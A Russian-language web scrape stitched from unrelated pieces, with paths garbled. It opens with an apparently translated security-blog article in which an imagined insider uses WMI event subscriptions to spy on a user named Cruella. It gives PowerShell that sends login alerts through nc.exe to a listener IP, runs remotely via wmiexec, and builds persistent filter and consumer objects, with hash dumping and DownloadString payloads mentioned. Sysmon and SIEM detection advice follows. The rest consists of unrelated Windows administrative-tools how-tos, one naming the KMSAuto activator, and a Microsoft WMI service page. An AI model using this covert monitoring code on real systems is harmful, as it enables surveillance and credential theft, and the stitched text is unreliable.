Следующий вопрос — как запрограммировать выполнение блока сценария. Загадочного инсайдера из моих фантазий интересует конкретный пользователь — Круэлла. Наш злодей потихоньку шпионил за Круэллой и теперь планирует использовать собранную информацию, чтобы взломать ее рабочую учетную запись.
Задача блока сценария — проверить, кто вошел в систему, и определить, была ли это Круэлла. Я написал несколько строк кода PowerShell для этой цели, но это явно не самый лучший способ. Я никак не использую информацию о событии, передаваемую в блок сценария, а именно сведения о новом пользователе. Я наталкиваюсь на препятствия, причины которых я не могу понять в данный момент. Для этого нужно больше технических знаний, чем наш гипотетический инсайдер имеет или готов приобрести.
Вместо этого я просто перебрал список пользователей, возвращаемых gwmi Win32_Process (попробуйте запустить этот командлет в сеансе PowerShell), и сопоставил их с параметром «Круэлла». Можете полюбоваться на мое финальное решение:
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {
$names=gwmi Win32_Process|% { $_.GetOwner().User}
foreach ($user in $names){
if ($user -eq "cruella") {
echo "cruella logged in"| C:UserslexDocumentsnc.exe 172.31.19.75 80
}
}
}
Register-WmiEvent позволяет сохранять скрытность, поскольку он запускается только при новом входе в систему, вместо того чтобы регулярно запрашивать объект Win32_Process, что может быть довольно заметным.
Помните, что наш инсайдер старается не привлекать к себе внимания. У нее есть доступ к удаленной системе через psexec, smbexec или wmiexec (самый незаметный способ). Однако ей не нужно постоянно бродить туда-сюда по системе жертвы.
В этом и прелесть использования событий WMI. Вы можете дождаться уведомления от Register-WmiEvent, а затем спокойно сделать свой ход.
Интеграция Netcat и WMI
Но каким образом сценарий возвращает горячую новость о том, что Круэлла вошла в систему на целевом компьютере?
Если вы заметили, что я использовал команды Netcat выше, можете поставить себе плюсик. Netcat — известная и универсальная утилита, позволяющая устанавливать соединения (необязательно для вредоносного ПО). С помощью нее можно выполнять обратное подключение или просто передавать сообщения по сети. Я воспользовался этой второй возможностью.
Приведенный выше сценарий отправляет сообщение Netcat в режиме ожидания и отображает надпись «Круэлла вошла в систему». Миссия выполнена.
Вы можете представить себе, как наш мошенник затем сбрасывает хеши с помощью инструмента secretsdump Impacket, взламывает хеш учетных данных Круэллы, после чего запускает wmiexec, используя разрешения Круэллы, для поиска более ценных данных.
Код Register-WmiEvent можно запустить напрямую. Обратите внимание на отображаемый идентификатор события
Устранение недочетов в механизме наблюдения WMI
В рамках этого примера я хотел удаленно запустить (используя wmiexec) полезную программу, которая будет предупреждать меня, когда конкретный пользователь, то есть Круэлла, входит в систему. После этого я мог спокойно сбросить и взломать ее учетные данные. Это был бы самый незаметный способ — удаленный доступ и никаких файлов. Единственная проблема, как мне поначалу казалось, заключалась во временном характере событий WMI.
Поэтому мне нужно было заключить мое непристойно длинное Register-WMIEvent (ниже) в командную строку PowerShell с параметром –noexit, обеспечивающим сохранение сеанса PowerShell после выполнения Register-Event, а значит, и сохранение события.
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process|% { $_.GetOwner().User};foreach ($user in $names){if ($user -eq "cruella") {echo "cruella logged in"| C:UserslexDocumentsnc.exe 172.31.19.75 80}}}
Когда я начал работать над этим, я понял, что должен «преобразовать» специальные символы, такие как $, “ и |, и передавать их как литералы непосредственно в PowerShell. Еще одна головная боль: мне в итоге пришлось отказаться от использования вертикальных линий, поскольку они вызывали ошибки анализа. Не спрашивайте. Постепенно я пришел к этой длинной строке кода:
$command="powershell -noexit -C Register-WMIEvent -Query ""Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3"" -Action {`$names = gwmi Win32_Process; `$users=@(); foreach (`$n in `$names) {`$users += `$n.GetOwner().User}; foreach (`$u in `$users) {if (`$u -eq ""cruella"") {.wmiexec C:UserslexDocumentsnc.exe 172.31.18.92 80 }}}
.wmiexec.exe corp.acme/lex@172.31.46.115 "$command"
Она выглядела многообещающе и, казалось, работала правильно, если верить журналу событий Windows в целевой системе. Однако, присмотревшись, я понял, что она не работает. Я уверен, что в итоге смог бы привести ее в нужный вид, но для этого мне потребовалось бы время и кофе, много кофе. Есть и другой вариант, чуть менее незаметный и совсем не бесфайловый: можно использовать smbclient для переноса сценария, а затем запустить его напрямую на целевом компьютере.
Удаленное выполнение сложного командлета Register-Event казалось мне абсолютно правильным. Но оно не работало. Ну и ладно
Увы, на этом этапе мои предположения о том, что сообразительный, но не слишком опытный инсайдер мог бы легко использовать временные события WMI для скрытого наблюдения, стали потихоньку разваливаться.
Почему при наблюдении нужно использовать постоянные события?
Правильный и одновременно требующий более глубоких знаний способ заключается в использовании постоянных событий WMI. Постоянные события WMI, хотя и представляют некоторую сложность, не только являются более эффективным инструментом для шпионов-инсайдеров, чем временные события, но и позволяют гораздо эффективнее отслеживать внутренние угрозы.
Изучение постоянных событий потребует некоторого времени, но они представляют наиболее эффективный способ реализации строгой системы мониторинга для больших систем. Они обладают более широкими возможностями, чем временные события WMI. Их также можно использовать для оповещения о нестандартной вредоносной активности, такой как DNS-туннелирование или нарушение политик Zero Trust.
Я посвятил изучению постоянных событий пару дней и обнаружил, что в PowerShell есть специальный командлет, который упрощает процесс создания фильтра событий, потребителя и объектов WMI между фильтром и потребителем. Как мы все знаем, PowerShell предоставляет администраторам широкие возможности для упрощения работы. К сожалению, данный пример показывает, как этими прекрасными возможностями могут воспользоваться злоумышленники.
Инсайдер создает постоянное событие на целевой системе, тем самым освобождая себя от необходимости присутствовать в сеансе оболочки. Событие остается там навсегда или до тех пор, пока не будет удалено явным образом. Подробнее о том, как это сделать, можно прочитать здесь , но в целом процесс похож на то, что я сделал выше с временным событием. Последнее, что потребуется от нашего хакера, — связать фильтр события с потребителем события.
Соглашусь, что для обычного сотрудника, который вдруг решил стать злобным хакером, это выглядит слишком круто. Ради интереса я почитал разные форумы и увидел, что многие люди безуспешно бьются над тем, чтобы заставить постоянные события WMI работать. Однако это вовсе не выходит за рамки возможностей нашего «Сноудена» и других сообразительных системных администраторов, которые решили перейти на темную сторону.
Постоянные события: советы для ИТ-администраторов
Эти методы не предназначены для обучения потенциальных хакеров или обиженных сотрудников, которые хотят отомстить работодателю. Все, чего я хочу, — это помочь ИТ-специалистам понять образ мысли хакера, чтобы они могли внедрить соответствующую защиту от атак на проникновение. Для них я показываю, как настроить фильтр и объекты потребителя с помощью командлета Set-WmiInstance:
$Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{
EventNamespace = 'root/cimv2'
Name = “cruella”
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser'"
QueryLanguage = 'WQL'
}
$command = "powershell.exe -Command {$names = gwmi Win32_Process; $users=@(); foreach ($n in $names) {$users += $n.GetOwner().User}; foreach ($u in $users) {if ($u -eq 'cruella') { C:userslexDocumentsnc.exe 172.31.45.240 10000}}}"
$Consumer = Set-WmiInstance -Namespace rootsubscription -Class CommandLineEventConsumer -Arguments @{
Name = "Consumer"
CommandLineTemplate = $Command
}
Ваше домашнее задание — придумать код PowerShell, который свяжет эти два компонента воедино.
В ходе моих собственных тестов я смог заставить постоянное событие работать на целевой системе без чрезмерных усилий и страданий. Как вы помните, этого было весьма сложно добиться с временными событиями WMI, которые длятся ровно столько, сколько и сеанс PowerShell.
Настроив постоянное событие WMI, чтобы, например, следить за входом пользователей в систему, инсайдер или хакер не обязан оставаться в целевой системе. Дополнительным бонусом является то, что постоянное событие WMI является устойчивым: при перезагрузке компьютера триггеры событий по-прежнему действуют. Это делает постоянные события WMI мощным и скрытным способом инициировать атаку, которая может включать гораздо больше, чем просто мониторинг. Как вы помните, события WMI — далеко не самое первое место, где специалисты по безопасности будут искать источник атаки.
Например, код PowerShell для потребителя события может выступать как средство запуска и скачивать вредоносное ПО, хранящееся на удаленном сервере, с помощью DownloadString. Великолепная презентация Мэтта Грэбера на конференции Black Hat содержит много информации о вредоносном потенциале постоянных событий WMI.
Если вы специалист по безопасности, то как вы будете работать с событиями WMI с точки зрения их потенциального вредоносного использования?
Удача на вашей стороне: с помощью командлета Get-WmiObject (псевдоним gwmi) можно создать список фильтров событий, потребителей и связывающих объектов:
Вы перечисляете постоянные события WMI с помощью Get-WMIObject и устанавливаете соответствующие параметры. Обратите внимание на отсутствие отметки о времени создания.
Теперь, если фильтр (или потребитель) постоянного события покажется им подозрительным, ИТ-специалисты могут отключить его путем удаления с помощью конвейера PowerShell и командлета WMI-RemoveObject:
Удаление постоянных событий WMI включает использование конвейера PowerShell
Обратите внимание, что здесь не указано ни время создания события, ни имя злонамеренного пользователя. Для получения этой криминалистической информации потребуется обратиться к журналам событий Windows. Подробнее об этом ниже.
Можно ли отключить постоянные события WMI?
По крайней мере, ИТ-специалисты могут быстро увидеть зарегистрированные постоянные события WMI и приступить к анализу сценариев реальных событий на наличие признаков угроз. Возможно, как опытный специалист по ИТ-безопасности, вы считаете, что не всем нужен WMI на ноутбуках и лучшая стратегия по работе с уязвимостями постоянных событий WMI — это совсем отключить WMI.
Можно попробовать отключить службу Winmgmt, которая запускает WMI. На практике это не так уж просто. В ходе моих собственных тестов я так и не смог отключить эту службу: она автоматически запускалась снова и снова.
Предположим, что вам все же удалось отключить ее. Административное программное обеспечение Windows во многом зависит от WMI и не будет работать, если Winmgmt недоступна. По всему Интернету форумы наполнены сообщениями, предостерегающими от отключения WMI. Советую к ним прислушаться и помиловать ваш WMI.
Выявление событий WMI, представляющих угрозу, с помощью Sysmon и SIEM
В общем, вам придется принять уязвимость событий WMI как факт. К счастью, есть более эффективные способы обнаружения постоянных событий и других подозрительных операций с событиями в Windows, чем использование вышеупомянутого командлета Powershell.
Знакомьтесь, Sysmon! Я не буду вдаваться в подробности, рассказывая об этой бесплатной утилите Windows, которую можно загрузить здесь, в этой статье. Скажу лишь, что она позволяет получать очень полезную информацию для анализа в одном месте, вместо того чтобы просматривать каждый журнал событий Windows по отдельности. Пользователям Windows 7 и более поздних версий возможности Sysmon могут не понадобиться, поскольку в новых системах Windows используются более совершенные механизмы ведения стандартных журналов.
Sysmon — удобная и понятная утилита для регистрации событий от Microsoft
Sysmon назначает идентификатор события 19 созданию постоянного событию фильтра WMI (20 назначается созданию события потребителя WMI, а 21 — связыванию WMI). Если вы откроете средство просмотра событий, вы найдете журнал событий Sysmon в разделе Microsoft -> Windows -> Sysmon.
Вы не хотите открывать средство просмотра событий вручную, чтобы отслеживать постоянные события WMI, которые могут быть признаком хакерской активности. Мы знаем, как вам помочь.
Почему бы не создать фильтр постоянных событий WMI для мониторинга создания (догадались?) постоянного события WMI?
На GitHub есть небольшой проект, где вы найдете код для настройки этой операции. Вот фрагмент кода для фильтра событий WMI, который позволяет отслеживать создание… да-да, фильтра событий WMI:
$Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{
EventNamespace = 'root/subscription'
Name = '_PersistenceEvent_'
Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 Where TargetInstance ISA "__EventConsumer"'
QueryLanguage = 'WQL'
}
Очевидно, что здесь нам понадобится помощь средств по управлению информационной безопасностью и событиями безопасности (SIEM), поскольку улики погребены в завалах журналов. Я думаю, вы понимаете, к чему все идет. Вам понадобится решение для мониторинга безопасности, объединяющее функции SIEM с анализом других угроз для обнаружения и устранения угроз, связанных с постоянными событиями WMI.
Часто задаваемые вопросы об инструментарии управления Windows
Описанные выше методы вполне могут быть использованы для реализации системы наблюдения в вашей сети, однако у вас могли остаться некоторые вопросы о WMI. В этом разделе мы ответим на самые распространенные из них.
WMI объявлен устаревшим?
Сам WMI не устарел, но была объявлена устаревшей WMIC, что вводит многих людей в заблуждение. Для доступа к функциям, ранее обеспечиваемым WMIC, теперь используется PowerShell.
Какие порты использует WMI?
WMI использует TCP-порт 135 и ряд динамических портов: 49152-65535 (динамические порты RPC: Windows Vista, 2008 и выше), TCP 1024-65535 (динамические порты RPC: Windows NT4, Windows 2000, Windows 2003). Вы также можете настроить для WMI пользовательский диапазон портов.
WMI использует WimRM?
Данная конфигурация не является стандартной, однако вы можете использовать WMI для получения данных с помощью сценариев или приложений, использующих WinRM Scripting API, или с помощью инструмента командной строки Winrm. WinRM может использовать WMI для сбора данных о ресурсах или для управления ресурсами в операционной системе Windows.
Заключение
Как мы увидели, WMI предоставляет администраторам мощный инструмент для мониторинга удаленных процессов и компьютеров и может использоваться при разработке соглашений о мониторинге конечных пользователей (EUMA) для автоматического оповещения о подозрительной активности. Это делает его отличным инструментом для обнаружения и устранения внутренних угроз, предотвращения попыток обойти политики безопасности, а также наблюдения за тем, как используются ваши системы.
Если вы хотите узнать больше о том, как использовать WMI для наблюдения за инсайдерской деятельностью, вы можете скачать наше подробное руководство здесь.
Содержание
- Способ 1: Поиск в меню «Пуск»
- Способ 2: «Панель управления»
- Способ 3: «Проводник»
- Способ 4: Утилита «Выполнить»
- Способ 5: «Терминал Windows»
- Способ 6: Пользовательский ярлык
- Вопросы и ответы
Перед началом разбора следующих методов отметим, что окно с элементами под названием «Администрирование» в Windows 11 было переименовано на «Инструменты Windows». Его содержимое практически не изменилось и оно используется для все тех же функций — перехода к конкретным настройкам или приложениям операционной системы. Как раз следующие методы и будут сосредоточены на том, чтобы перейти к окну «Инструменты Windows».
Способ 1: Поиск в меню «Пуск»
Самый простой и быстрый метод перехода к необходимому окну в Windows 11 — использование для этого поиска через меню «Пуск». Оно реализовано таким образом, что позволяет по названию отыскать классические приложения и запустить их в отдельном окне. Это позволит справиться с поставленной задачей, а наглядно весь процесс выглядит следующим образом:
- Откройте меню «Пуск», активируйте строку поиска, впишите там название «Инструменты Windows» и щелкните левой кнопкой мыши по появившемуся соответствию.
- Через секунду на экране отобразится окно с перечнем всех доступных инструментов, многие из которых ранее были представлены в окне «Администрирование». Кликните дважды ЛКМ по любому из них, чтобы перейти к использованию.
- Отображающееся на экране окно зависит исключительно от того, какой инструмент вы выбрали. Разбирать предназначение всех приложений, находящихся в списке инструментов, в этой статье мы не будем.
Способ 2: «Панель управления»
В предыдущих Windows для перехода к «Администрированию» чаще всего пользователи задействовали «Панель управления». В Виндовс 11 ничего, помимо названия, не изменилось. В этом же приложении можно найти соответствующий значок, который и позволит перейти к необходимому меню.
- Сначала откройте «Пуск», впишите в нем «Панель управления» и перейдите к данному классическому приложению.
- В его окне обратите внимание на настройку «Просмотр» и установите тип просмотра «Крупные значки» или «Мелкие значки», чтобы получить подходящее представление меню.
- Отыщите пункт с названием «Инструменты Windows» и нажмите по нему дважды левой кнопкой мыши для вызова параметров администрирования.
- Отобразится такое же окно, о котором говорилось в предыдущем методе. Можете переходить через него к другим инструментам и взаимодействовать с ними для своих целей.
Способ 3: «Проводник»
По сути, окно с инструментами Windows отображает в графическом интерфейсе значки для запуска исполняемых файлов, которые и позволяют переходить к необходимым системным параметрам, утилитам или различным мониторам. У каждого из этих значков есть свой ярлык, который нужен для корректного запуска приложения. Список этих ярлыков можно отыскать вручную через «Проводник» и использовать каталог для запуска средств администрирования.
- Откройте «Проводник» любым удобным для вас методом и перейдите в нем по пути
C:ProgramDataMicrosoftWindowsStart MenuProgramsAdministrative Tools
. - Обратите внимание на список ярлыков в этом каталоге. Щелкните по любому из них дважды для запуска соответствующего системного инструмента.
- Как и обычно, появится отдельное окно с различными параметрами, мониторами и другими функциями, подразумевающими различное взаимодействие с операционной системой.
Способ 4: Утилита «Выполнить»
Известная многим утилита «Выполнить» в Windows 11 часто используется для вызова различных оснасток и быстрого перехода к системным настройкам. В нашем случае она тоже подойдет, поскольку позволяет открыть «Инструменты Windows» путем ввода всего одной команды. Сама утилита запускается при помощи стандартного сочетания клавиш Win + R. В поле ввода понадобится ввести control admintools
и нажать Enter для перехода к нужному окну.
На следующем скриншоте вы видите, что после активации команды запустилось требуемое окно «Инструменты Windows». Теперь можете ознакомиться со всеми пунктами, после чего запустить требуемые приложения для дальнейшей работы с ними.
Предлагаем остановиться еще на одном методе, который подразумевает использование команды для перехода к окну «Инструменты Windows». Однако в данном случае она будет иметь немного другой вид, а для ее активации понадобится воспользоваться PowerShell, что осуществляется так:
- Щелкните правой кнопкой мыши по кнопке «Пуск» и из появившегося контекстного меню выберите «Терминал Windows».
- После запуска консоли вставьте в поле ввода команду
control /name Microsoft.AdministrativeTools
и нажмите Enter для ее активации. - Спустя секунду на экране появится уже знакомое окно, которое вас и интересует. В нем вы найдете все нужные средства администрирования.
Способ 6: Пользовательский ярлык
Некоторые пользователи заинтересованы в частом переходе к инструментам Windows и желают делать это максимально быстро. Согласимся, что предыдущие способы и так подразумевают выполнение минимального количества действий, но открыть необходимое окно можно еще быстрее, создав для этого специальный ярлык на рабочем столе.
- Щелкните в любом удобном месте на рабочем столе правой кнопкой мыши, наведите курсор на пункт «Создать» и из появившегося меню выберите «Ярлык».
- Обычно указывается путь к ярлыку, но мы будем использовать просто команду
control admintools
, которую нужно вставить в единственное доступное поле. Нажмите «Далее» для перехода к следующему шагу. - Вы можете указать совершенно любое название для ярлыка, чтобы всегда знать, за переход к какому меню он отвечает. После переименования нажмите по «Готово», подтверждая тем самым добавление ярлыка.
- Теперь достаточно просто дважды кликнуть по нему левой кнопкой мыши, чтобы быстро перейти к тому же самому окну, которое неоднократно фигурировало в статье.
Еще статьи по данной теме:
Помогла ли Вам статья?
Практически все операционные системы семейства Windows, начиная еще с явно сырых и недоработанных модификаций 95 и 98, просто изобилуют наличием системных инструментов, обычно скрытых от глаз рядового пользователя. В общем смысле весь этот набор можно назвать инструментарием управления Windows, хотя в системе можно найти и отдельную отвечающую за его использование службу. Давайте попробуем разобраться, что это такое, какие инструменты входят в этот набор, почему пользователю нужно их использовать, и как управлять системой с их помощью.
Инструментарий управления Windows: что это такое?
Для начала кратко остановимся на том, что это за набор. Прежде всего, нужно четко понимать, что это именно совокупность инструментов, а не отдельная программа. В руководстве к инструментарию управления Windows об это сказано достаточно четко. Сам же набор состоит из множества служб и процессов, которые можно использовать для совершенно разных целей, а при необходимости даже устранять возникающие неполадки. К основным же задачам всего инструментария можно отнести следующие:
- получение информации об операционной системе, аппаратной и программной части компьютера;
- управление системной конфигурацией и другими компонентами;
- мониторинг стабильности системы и нагрузок на ресурсы;
- проверка и диагностика ОС и основных составляющих компьютера;
- выявление и устранение возможных неполадок и сбоев.
Полезные инструменты, о которых нужно знать каждому пользователю
Само собой разумеется, что абсолютно все инструменты, входящие в состав инструментария управления Windows 10 и версий ниже, рассмотреть не получится чисто физически. Поэтому остановимся только на самых основных и именно тех, которые могут понадобиться пользователю чаще всего. Среди них наиболее часто используемыми можно выделить следующие разделы:
- сведения о системе;
- конфигурация системы;
- управление компьютером.;
- мониторы действий, состояния, производительности и стабильности работы;
- проверка и очистка дисков или съемных носителей;
- диагностика памяти;
- средство устранения неполадок.
Конечно, это далеко не полный перечень всего того, что можно было бы включить в инструментарий управления Windows, однако рядовому пользователю пока хватит и этого набора.
Получение информации о системе
К сожалению, мало кто из пользователей знает или всерьез задумывается о том, что получить практически исчерпывающую информацию об операционной системе, программном и аппаратном обеспечении можно получить с помощью средств самой системы, не прибегая к помощи сторонних утилит. Последние, конечно, обладают несколько большей информативностью, тем не менее многие из них являются платными и используются в основном для разгона оборудования, чем без специальных знаний и навыков заниматься не рекомендуется.
Среди же основных средств инструментария управления Windows особо можно выделить апплеты msinfo32 и winver, вызываемые из меню «Выполнить». Первая предоставляет данные в основном об аппаратной части, вторая предназначена для уточнения текущей версии операционной системы.
Кроме этого, весьма мощным средством можно назвать «Диспетчер устройств», позволяющий узнать практически все об установленном «железном» и виртуальном оборудовании, управлять драйверами, а также устранить многие неполадки в его работе. Например, специальные идентификаторы DEV и VEN могут быть использованы для поиска наиболее подходящего управляющего программного обеспечения, если система самостоятельно найти и установить его не может.
Средства управления компьютерной системой
Раздел управления компьютером является одним из самых значимых. В него входит несколько основных компонентов, из которых особо можно выделить «Планировщик заданий», управление дисками, производительность, просмотр событий, службы и упомянутый уже «Диспетчер устройств».
Сразу стоит обратить внимание на то, что любой из этих инструментов можно вызвать отдельно, не прибегая к использованию основного раздела.
Что же касается инструментов, мало кто из рядовых пользователей в полной мере понимает возможности того же планировщика. А ведь в нем можно создавать автоматически выполняемые по расписанию задачи, включая даже включение и выключение компьютера. Одним из примеров можно назвать работу приложения KMSAuto Net, при помощи которого была активирована сама операционная система или офисные продукты. Естественно, программа сама создает новую задачу, но при желании период повторной активации можно изменить.
Управление дисками – инструмент незаменимый. Появился он только в седьмой версии, и с его помощью стало возможно разбивать диски на разделы или производить с ними более сложные действия непосредственно в работающей системе (раньше для этого требовались сторонние утилиты).
Раздел просмотра событий говорит сам за себя. В нем представлена информация, касающаяся всех последних действий на компьютере, включая и отчеты об ошибках, которые могут послужить отправной точкой при выявлении и устранении критических сбоев в работе компьютера.
Раздел служб используется для управления всеми программными компонентами. В нем можно задать включение или отключение абсолютно всех программных процессов, включая и те, которые выполняются в системе в фоновом режиме. К примеру, именно в этом разделе можно полностью отключить обновление системы путем деактивации нескольких отвечающих за него компонентов (если кто не знает, отключение автоматического поиска и установки апдейтов в «Центре обновления» для полной деактивации службы недостаточно).
Утилита производительности относится больше к мониторинговой части, но и ее сбрасывать со счетов не стоит.
А вот конфигурация системы (msconfig) – инструмент абсолютно незаменимый, поскольку именно здесь задается выбор загружаемой ОС при старте, если их несколько, устанавливается тип старта, производится управление некоторыми стартующими с системой службами и элементами автозагрузки (в Windows 10 он вынесен в «Диспетчер задач») и т.д.
Мониторинг
В плане производительности большинство пользователей обычно обращается к «Диспетчер задач», в котором можно отслеживать активные или отключенные процессы и управлять их поведением. Да, это так, но полной картины происходящего пользователь все равно не получит.
Для вывода подробной информации лучше использовать так называемые мониторы ресурсов и стабильности системы, в которых можно получить максимум сведений о работе собственной компьютерной системы, и при необходимости принять меры по предотвращению появления неполадок и сбоев.
Проверка компонентов и устранение неполадок
Что касается инструментария проверки, здесь можно выделить действия с дисками или съемными носителями и тестирование оперативной памяти. Однако для тестирования системных компонентов они не годятся. При критических сбоях систему можно привести в работоспособное состояние только средствами командной строки. Например, проверить целостность важных файлов, отвечающих за функционирование Windows и восстановить их, если проблемы будут обнаружены, можно командой sfc /scannow. Вообще, в командной консоли, которую рядовые пользователи явно недолюбливают, можно выполнить такие действия, которые через графический интерфейс оказываются недоступными.
Наконец, иногда при сбоях можно применять и автоматизированное средство устранения неполадок, которое призвано выявлять и устранять сбои самостоятельно. Иногда это дает результат, иногда – нет. Но в качестве первого решения при обнаружении ошибок в системе или в работе оборудования использовать его стоит однозначно.
Другие важные компоненты
Как уже говорилось выше, в любой версии Windows можно насчитать и еще уйму нужных инструментов. Наиболее значимыми являются редактора реестра, а также средства работы с групповыми и локальными политиками, которые, по большому счету, дублируют параметры реестра, но с более низким приоритетом. И, если с политиками рядовой пользователь может производить какие-то эксперименты, то вмешиваться в реестр без полного понимания выполняемых действий категорически запрещается, поскольку в самом редакторе средств отмены действий нет (они предусмотрены лишь только при изменении значений ключей). Зато именно с помощью файла реестра, в который был произведен экспорт, операционную систему при наличии соответствующих знаний труда не составит (то же самое касается и ручного создания всевозможных резервных копий и образцов дисков с работающей операционной системой и всем ее содержимым).
Как отключить инструментарий управления Windows и стоит ли это делать?
Остается посмотреть на одну из самых главных проблем. Некоторые пользователи достаточно часто обращают внимание на то, что активный процесс инструментария управления Windows загружает процессор, и пытаются его отключать. Здесь нужно понимать, что нагрузка на ресурсы в такие моменты производится не со стороны основной службы, а со стороны запущенных системных или пользовательских процессов.
Произвести деактивацию инструментария можно в разделе служб, но, как уже понятно, отключать службу инструментария управления Windows полностью не рекомендуется ни в коем случае, поскольку доступ ко многим инструментам окажется ограниченным или заблокированным, да, и вся система, включая некоторые программы, может работать нестабильно.
- Открытие «Инструментов Windows» через «Панель управления»
- Открытие «Панели администрирования» Windows 11 через «Проводник»
- Открытие «Инструментов Windows» через программу «Выполнить», командную строку и PowerShell
- Создание папки-ярлыка для доступа к «Инструментам Windows»
«Панель/инструменты администрирования» или просто «Администрирование» в Windows 11 именуется как «Инструменты Windows», потому пользователи новой системы и не могут сразу обнаружить их. Самый простой способ их открытия — использование встроенной в меню «Пуск» поисковой строки. Т.е. просто вписываем в нее запрос «Инструменты Windows» и затем кликаем по отобразившемуся значку:
1
Но есть и ряд других способов открытия «Инструментов Windows». Кроме того, можно создать и разместить на рабочем столе или в разделе «Быстрый доступ» менеджера «Проводник» специальную системную папку-ярлык, при открытии которой можно будет сразу попасть в искомую панель администрирования. Это окажется полезным для тех, кому часто приходится запускать тот или иной инструмент, доступный через данную панель.
Открытие «Инструментов Windows» через «Панель управления»
Первым делом нужно открыть «Панель управления», что можно сделать при помощи того же поиска в меню «Пуск» или путем выполнения команды «control» в окне «Выполнить». Для использования второго способа нажмите клавиши «Win + R», впишите указанную команду в открывшееся окно и нажмите «ОК»:
Далее в «Панели управления» перейдите в раздел «Система и безопасность»:
В нижней части списка подразделов находится элемент «Инструменты Windows» — кликаем по нему.
Открытие «Панели администрирования» Windows 11 через «Проводник»
Через файловый менеджер «Проводник» можно перейти практически в любой раздел/подраздел «Панели управления». Для перехода к «Инструментам Windows» просто скопируйте нижеследующий адрес в адресную строку «Проводника» и нажмите «Enter» (не имеет значения, какая в данный момент папка открыта в «Проводнике»):
Панель управленияСистема и безопасностьИнструменты Windows
«Инструменты Windows» при этом будут открыты в новом окне (в «Панели управления»). Но можно воспользоваться и фактическим адресом местоположения входящих в панель администрирования инструментов:
C:ProgramDataMicrosoftWindowsStart MenuProgramsAdministrative Tools
При переходе по этому адресу искомая панель будет открыта в самом «Проводнике», а все доступные в ней инструменты будут доступны для запуска с ярлыков:
Открытие «Инструментов Windows» через программу «Выполнить», командную строку и PowerShell
Существуют две команды, позволяющие перейти в панель администрирования Windows 11 из указанных в заголовке системных приложений:
- control admintools
- control /name Microsoft.AdministrativeTools
Открываем панель из системной программы «Выполнить» («Win + R» для вызова):
Открываем командную строку (можно открыть, вписав в поиск «Пуска» запрос «командная строка» или «cmd»), вписываем одну из двух команд и нажимаем Enter:
Открываем PowerShell (также можно найти через поиск «Пуска» при помощи запроса «PowerShell»), вписываем команду и затем — Enter:
Создание папки-ярлыка для доступа к «Инструментам Windows»
Чтобы не мучиться каждый раз, когда потребуется открыть «Инструменты Windows», можно создать специальную папку-ярлык на рабочем столе или в любом другом месте на диске. Вообще, это самая обыкновенная папка, только с необычным именем:
- Создайте новую папку в любом месте на диске и назовите ее следующим образом:
Администрирование.{D20EA4E1-3957-11d2-A40B-0C5020524153}
- Откройте папку обычным образом. На экране отобразится панель администрирования.
Эту папку также можно будет закрепить в секции «Быстрый доступ» файлового менеджера «Проводник» для еще большего упрощения доступа к «Инструментам Windows». Кликните по ней правой кнопкой мыши и выберите из контекстного меню пункт «Закрепить на панели быстрого доступа»:
На этом все.
В данной статье показаны действия, с помощью которых можно открыть «Средства администрирования Windows» в операционной системе Windows 10.
Администрирование — это папка в панели управления, содержащая средства для системных администраторов и опытных пользователей. Средства администрирования в папке могут отличаться в зависимости от используемой версии Windows.
Пример папки «Администрирование» показан на скриншоте ниже.
Содержание
- Средства администрирования в меню Пуск
- Открытие через Поиск
- Через панель управления
- Запуск через Проводник Windows
Средства администрирования в меню Пуск
Чтобы открыть «Средства администрирования Windows», откройте меню Пуск, в списке приложений в группе под буквой «С», найдите и разверните папку Служебные — Windows и выберите Средства администрирования Windows.
Также можно непосредственно из меню «Пуск» запустить необходимую утилиту из состава средств администрирования Windows, для этого откройте меню «Пуск», в списке приложений в группе под буквой «С», найдите и разверните папку Средства администрирования Windows и выберите необходимую утилиту.
Открытие через Поиск
Чтобы открыть «Средства администрирования Windows», используйте «Поиск в Windows», для этого нажмите на значок поиска в панели задач или нажмите сочетание клавиш + S, в строке поиска начните вводить администрирование и в результатах поиска выберите Средства администрирования Windows.
Через панель управления
Откройте классическую панель управления, в выпадающем списке Просмотр: выберите Мелкие значки и затем выберите пункт Администрирование.
Запуск через Проводник Windows
Откройте Проводник Windows и в адресную строку скопируйте и вставьте следующий путь:
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools
Используя рассмотренные выше действия, можно открыть «Средства администрирования Windows» в операционной системе Windows 10.
Permalink
Cannot retrieve contributors at this time
description | ms.assetid | ms.tgt_platform | title | ms.topic | ms.date | topic_type | api_name | api_type | api_location |
---|---|---|---|---|---|---|---|---|---|
WMI runs as a service with the display name «Windows Management Instrumentation» and the service name «winmgmt». |
8dff43bf-71d0-4d5a-91bc-6f474186d4ba |
multiple |
Starting and Stopping the WMI Service |
article |
09/10/2021 |
kbArticle |
WMI runs as a service with the display name «Windows Management Instrumentation» and the service name «winmgmt». WMI runs automatically at system startup under the LocalSystem account. If WMI is not running, it automatically starts when the first management application or script requests connection to a WMI namespace.
Several other services are dependent upon the WMI service, depending on the operating system version that the system is running.
Starting Winmgmt Service
The following procedure describes how to start the WMI service.
To start Winmgmt Service
-
At a command prompt, enter net start winmgmt [/<switch>].
For more information about the switches that are available, see winmgmt. You use the built-in Administrator account or an account in the Administrators group running with elevated rights to start the WMI service. For more information, see User Account Control and WMI.
-
Other services that are dependent on the WMI service, such as SMS Agent Host or Windows Firewall, will not automatically be restarted.
Stopping Winmgmt Service
The following procedure describes how to stop the WMI Service.
To stop Winmgmt Service
-
At a command prompt, enter net stop winmgmt.
-
Other services that are dependent on the WMI service also halt, such as SMS Agent Host or Windows Firewall.
Related topics
Using the WMI Command-Line Tools
Permalink
Cannot retrieve contributors at this time
description | ms.assetid | ms.tgt_platform | title | ms.topic | ms.date | topic_type | api_name | api_type | api_location |
